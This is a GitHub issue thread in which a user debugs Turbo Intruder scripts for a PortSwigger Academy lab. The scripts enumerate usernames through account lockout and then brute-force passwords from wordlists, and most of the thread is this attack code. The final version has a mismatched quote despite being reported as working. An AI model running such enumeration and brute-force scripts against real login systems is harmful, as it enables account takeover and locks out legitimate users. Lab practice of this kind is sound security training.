### ISSUE TITLE
req.engine.queue hangs execution

### ISSUE THREAD

**Issue by NathanZaldivar** [PortSwigger/turbo-intruder#120]
While solving a lab on [PortSwigger web academy](https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-account-lock) I tried to solve the lab using your recursive template using the req.engine.queue function which hangs my execution. Here is my code:

    def queueRequests(target, wordlists):

        engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=1000, engine=Engine.BURP)
                           
        for word in open(r"users.txt"):
            engine.queue(target.req, [word.rstrip(), "PasswordWontWOrkd".rstrip()])

    def handleResponse(req, interesting):
        table.add(req)
        if 'Invalid username or password.' not in req.response:
            for word in open(r"passwords.txt"):
                req.engine.queue(req.template, [req.words[0].rstrip(), word.rstrip()])

Am I doing something wrong? I cant for the life of me get it to queue my request.

Thanks!

**Comment by albinowax** [comment]
I can't see any issues with this at a glance. IIRC req.engine has a slightly difference interface from engine so it might not like the list argument. You might find some useful output in the Extender tab.

**Comment by albinowax** [comment]
Oh I think I know what this is: 
- engine.queue() blocks if the request queue is full
- handleResponse() blocks handling the next response

Try setting maxQueueSize=10000 on the request engine.

**Comment by NathanZaldivar** [comment]
Unfortunately that did not fix the problem. Here is my updated code.

`

    def queueRequests(target, wordlists):

        engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=1, requestsPerConnection=10000, engine=Engine.BURP)
        engine.queue(target.req, [randstr(5), "ThisPasswordWontWork!"], learn=1)
    
        for word in open(r'users.txt'):

            for attempt in range(3):
                # This will lockout the account
                engine.queue(target.req, [word.rstrip(), "ThisPasswordWontWork!"])
            
            engine.queue(target.req, [word.rstrip(), "ThisPasswordWontWork!"])


    def handleResponse(req, interesting):

        table.add(req)
    
        if interesting:

            username = req.words[0]
            print("[DEBUG] Found username: " + username)
            # req.engine.queue(target.req, [username.rstrip(), "ThisPasswordWontWork!"], learn=2)

            for password in open(r'passwords.txt'):

                print("[DEBUG] Queuing username and password " + username + ":" + password)
                req.engine.queue(req.template, [username.rstrip(), password.rstrip()])

            
`

Attached is the output of the extension form start and halt of execution. I also provided some debug print statements but I was not able to get anything interesting from them.

[out.txt](https://github.com/PortSwigger/turbo-intruder/files/9963397/out.txt)

**Comment by NathanZaldivar** [comment]
Works like a charm, Thanks! Here is my updated code.

    ValidUsernames = []
    
    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=1,
                               requestsPerConnection=10000,
                               maxQueueSize=10000,
                               engine=Engine.BURP
                               )
        
        engine.queue(target.req, [randstr(5), "ThisPasswordWontWork!"], learn=1)
        
        for word in open(r'users.txt'):
    
            for attempt in range(3):
                # This will lockout the account
                engine.queue(target.req, [word.rstrip(), "ThisPasswordWontWork!"])
                
            engine.queue(target.req, [word.rstrip(), "ThisPasswordWontWork!"])
    
    
    def handleResponse(req, interesting):
    
        table.add(req)
        
        if interesting:
    
            username = req.words[0]
            
            # req.engine.queue(target.req, [username.rstrip(), "ThisPasswordWontWork!"], learn=2)
    
            if username not in ValidUsernames:
    
                ValidUsernames.append(username)
            
                for password in open(r"passwords.txt'):

                    req.engine.queue(req.template, [username.rstrip(), password.rstrip()])

I will note that the commented line for req.engine.queue with learn = 2 will break my turbo intruder window if I include it, seems that when it runs its clears the table and freezes the window but I have not delved to deep into it.
